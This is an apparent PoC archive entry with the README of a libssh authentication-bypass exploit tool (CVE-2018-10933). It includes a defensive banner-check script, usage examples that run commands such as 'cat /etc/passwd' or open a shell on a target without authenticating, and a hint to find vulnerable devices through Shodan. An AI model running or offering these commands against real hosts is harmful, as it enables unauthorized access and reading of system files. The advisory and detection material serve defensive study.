PoC details: c32ee943314ab34a0b1b88a676b09c47c9b03cec

Source
Related vulnerability
Title: libssh server-side state machine security vulnerability (CVE-2018-10933)
Description: libssh is a C library for accessing the SSH service; it can execute remote commands and transfer files, and provides a secure transport channel for remote programs. The server-side state machine is one of its server-side components. A security vulnerability exists in the server-side state machine of libssh versions before 0.7.6 and before 0.8.4. An attacker can use a malicious client to exploit this vulnerability to create channels without authenticating, thereby gaining unauthorized access.
Description
libSSH-Authentication-Bypass
Introduction

# CVE-2018-10933
![](https://www.bastify.com/wp-content/uploads/2019/02/ssh-tunneling.png)

***
A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4.
A malicious client could create channels without first performing authentication, resulting in unauthorized access.
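As an added example (not code from this repository), a banner-based check that applies the affected ranges stated above to the identification string an SSH server sends on connect, for auditing hosts you operate. It assumes the banner has the form `SSH-2.0-libssh_X.Y.Z` or `SSH-2.0-libssh-X.Y.Z`; the sample banners are constructed.

```python
import re

# Fixed releases named in the advisory text above: 0.7.6 and 0.8.4.
FIXED_0_7 = (0, 7, 6)
FIXED_0_8 = (0, 8, 4)

# Assumption: the server identification string looks like "SSH-2.0-libssh_0.8.3"
# or "SSH-2.0-libssh-0.7.5"; anything else is treated as "not libssh".
BANNER_RE = re.compile(r"^SSH-2\.0-libssh[_-](\d+)\.(\d+)\.(\d+)")


def parse_libssh_version(banner):
    """Return (major, minor, patch) from a libssh banner, or None if it is not libssh."""
    m = BANNER_RE.match(banner.strip())
    if m is None:
        return None
    return tuple(int(part) for part in m.groups())


def is_vulnerable_version(version):
    """Affected ranges: every release before 0.7.6, and the 0.8 series before 0.8.4."""
    if version[:2] == (0, 8):
        return version < FIXED_0_8
    return version < FIXED_0_7


def assess_banner(banner):
    """Classify one banner as 'not-libssh', 'vulnerable' or 'patched'."""
    version = parse_libssh_version(banner)
    if version is None:
        return "not-libssh"
    return "vulnerable" if is_vulnerable_version(version) else "patched"


# Constructed sample banners, as an SSH server sends them on connect.
SAMPLE_BANNERS = [
    "SSH-2.0-libssh_0.8.3\r\n",
    "SSH-2.0-libssh-0.7.5\r\n",
    "SSH-2.0-libssh_0.8.4\r\n",
    "SSH-2.0-libssh_0.9.0\r\n",
    "SSH-2.0-OpenSSH_7.9\r\n",
]

if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(f"{banner.strip():28} -> {assess_banner(banner)}")
```

This is only a version heuristic: a distribution may backport the fix under an older version number, so confirm against the package changelog before treating a host as unpatched.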

## SOME DETAILS
The issue stems from libssh not tracking authentication state, which lets a client bypass authentication entirely. Think of the connection as a multi-step process: step 1, step 2, step 3... Because libssh does not enforce the order of those steps, a client can jump straight to step 3 without going through steps 1 and 2.

Interestingly, the same issue was found in the SSH library Paramiko earlier: CVE-2018-7750.

## Documentation
Exploit-DB : https://www.exploit-db.com/exploits/45638

Information about CVE-2018-10933 by libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt

Bugfix Release by libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/

## Setup

```
sudo apt-get install python3

gh repo clone EmmanuelCruzL/CVE-2018-10933
cd CVE-2018-10933

pip3 install -r requirements.txt

python3 main.py
```
## Usage
```
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host

Script for the vulnerabilities CVE-2018-10933

positional arguments:
  host                  the ip or domain address of ssh server

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  The port the service ssh, default [22]
  -log, --logfile       Logfile to write conn logs
  -t, --test            check the version of libSSH
  -c COMMAND, --command COMMAND
                        command to execute
  -i, --interactive     open the interactive mode
   
```

## POC EXAMPLES

### EXAMPLE (check whether the host is vulnerable)
```
python3 main.py 0.0.0.0 -p 22 -t
```
![](https://imgr.co/cache/img/2b54583d34c2d1406025927166ad6d1f.jpg)

### EXAMPLE (send a command via argument)
```
python3 main.py 0.0.0.0 -p 22 -c "cat /etc/passwd"
```
![](https://i.imgur.com/mGCfyt4.png)

### EXAMPLE (using the simple interactive console)
```
python3 main.py 0.0.0.0 -p 22 -i
```
![](https://i.imgur.com/F2f3ral.png)


## Shodan.io libSSH
```diff
[!] Vulnerable devices can be found using shodan.io
- (port 22 is the default; other ports such as 2222, 3333 and 4444 may also be running libSSH)
```

![](https://i.imgur.com/MBUWEg4.png)


## Authors

- [Rubickcuv](https://github.com/EmmanuelCruzL)
File snapshot

```
[4.0K] /data/pocs/c32ee943314ab34a0b1b88a676b09c47c9b03cec
├── [4.0K] logs
│   ├── [3.4K] log_libssh_192.168.8.24_2022-07-28T09:07:37.182989.log
│   ├── [   0] log_libssh_192.168.8.24_2022-07-28T09:08:11.296178.log
│   └── [3.4K] log_libssh_192.168.8.24_2022-07-28T09:09:05.689190.log
├── [3.5K] main.py
├── [2.4K] README.md
├── [  30] requirements.txt
└── [1.6K] server.py

1 directory, 7 files
```